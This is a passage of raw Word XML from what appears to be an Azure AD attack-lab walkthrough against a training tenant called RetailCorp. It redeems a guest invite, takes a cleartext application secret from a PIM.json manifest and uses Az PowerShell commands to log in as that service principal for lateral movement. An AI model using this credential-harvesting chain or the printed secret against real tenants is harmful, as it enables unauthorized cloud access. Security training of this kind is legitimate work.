              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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r>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="53EEC3A8" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="525"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="291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2A33ADFB" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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InvitedUserMessageInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618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BA63FEA" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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 class InvitedUserMessageInfo {</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="1FF92D44" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="291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9D4E119" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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618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6CC201F" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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bl>
    <w:p w14:paraId="354A41AD" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2490"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="3B3929BD" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="249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CC6579F"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66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01C5D6E"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CcRecipients:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="618678DE" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9090" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B031D44" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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System.Collections.Generic.List`1[Microsoft.Open.MSGraph.Model.Recipient]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="6A842D34" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="249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ED7BB34"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66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535C2EF"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CustomizedMessageBody:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="4F807A1C" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="249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BC710AF"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66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ED7FFE3"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MessageLanguage:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="47609EA8" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="249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ED96B6D"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66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5FAF39D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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r>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="062CFA0A" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="45"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="249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0B37DF4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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66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0F3DB32" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="41111A1F" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="249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6810231"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InvitedUserType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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E3DB9E4"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 Guest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="30020E94" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="249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823FD3D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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27B6EF2B" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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 PendingAcceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="561398EB" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="45"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="249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59F601F4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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66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DB5E4B3" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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bl>
    <w:p w14:paraId="48DE4CCE" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="510" w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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Copy the InviteRedeemUrl and browse to it using a web browser. Login as the user that you invited and accept the permissions!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13356816" w14:textId="623B0E84" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="728A1663" wp14:editId="0B8757AC">
            <wp:extent cx="5943600" cy="32289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228975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E6C107" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>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After login you will be redirected to https://portal.zure.com, you may need to switch directory to go to RetailCorp tenant. See the screenshots below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6987E363" w14:textId="333553AB" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3689D644" wp14:editId="72F16ED2">
            <wp:extent cx="3381375" cy="23145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81375" cy="2314575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B2F80" w14:textId="34C5A731" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60EDC3BF" wp14:editId="557CEE0F">
            <wp:extent cx="5943600" cy="9067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906780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCA0683" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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In some cases, you might need to logout and login again from the portal for your user to be added to the dynamic group. In any case, Azure may take 5-6 minutes before the user is added to the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D688E3C" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="300" w:after="0" w:line="270" w:lineRule="atLeast"/>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lastRenderedPageBreak/>
        <w:t>Once the user is added to the PIMAdmins group, navigate to 'All Resources' in the Azure Portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F254193" w14:textId="5E45E088" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7B5673" wp14:editId="5094246A">
            <wp:extent cx="5943600" cy="19392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939290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351A3EE" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="285" w:lineRule="atLeast"/>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You will see the retailcorp storage account. Browse to 'Containers' in the storage account. Recall that we already accessed the configuration container in the storage account as that container allows anonymous access. However, you will find an additional container named 'pimadmins'. The container contains a file 'PIM.json'. Download it!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0AC14A" w14:textId="1C46E81E" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B02802" wp14:editId="6EA3C845">
            <wp:extent cx="5943600" cy="1665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1665605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA6404C" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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The PIM.json file is a manifest for an Enterprise Application named 'PIM'. Look at the 'passwordCredentials' parameter in there and you will find application password for this application:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9090"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="574CBAE7" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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DFD8CBB"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"passwordCredentials": [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330CDC25" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="30"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F6634D0" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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"customKeyIdentifier": null,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F04B9F8" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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"endDate": "2023-12-02T06:44:44.945Z",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="535F57F4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="30"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"keyId": "1c4ea66d-f755-4404-91ce-8f4a509c6756",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BBE04F5" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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"startDate": "2021-12-02T06:44:44.945Z",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13D0F244" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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"value": "mEY7Q~PByrDX88Q4Rqoelzu~rHyLqhFgp-Ycb",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51EAC436" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="30"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"createdOn": "2021-12-02T06:45:03.1827138Z",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36763D96" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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"hint": "mEY",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71256188" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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"displayName": "Creds"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421B8788" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="30"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="352B4041" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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r>
    </w:tbl>
    <w:p w14:paraId="35AB2016" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="570" w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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lastRenderedPageBreak/>
        <w:t>We can use these credentials to access the tenant as the PIM application. Also note the 'appId' in the beginning of PIM.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FAC29D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="435EBE"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08B39D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="30" w:after="0" w:line="270" w:lineRule="atLeast"/>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Use the below Az PowerShell commands to access the tenant as PIM enterprise application!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF58D0" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13200" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13200"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="10648F24" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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25F138B"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PS C:\AzAD\Tools&gt; $password = ConvertTo-SecureString 'mEY7Q~PByrDX88Q4Rqoelzu~rHyLqhFgp-Ycb' -AsPlainText -Force</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>PS C:\AzAD\Tools&gt; $creds = New-Object System.Management.Automation.PSCredential('20eb5f4e-317a-4987-a384-298bf636f082', $password)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="547D93FC" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="75"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br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="70A3183D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="30"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PS C:\AzAD\Tools&gt; Connect-AzAccount -ServicePrincipal -Tenant "711c59fe-8dee-40c0-adc1-ed08f738de43" -Credential $creds</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BE5D95E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="45"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WARNING: The provided service principal secret will be included in the 'AzureRmContext.json' file found in the user profile ( C:\Users\studentuser1\.Azure ). Please ensure that this</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD0B2B4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="60"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directory has appropriate protections.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CD41358" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3930"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="2640"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="70BF11A7" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
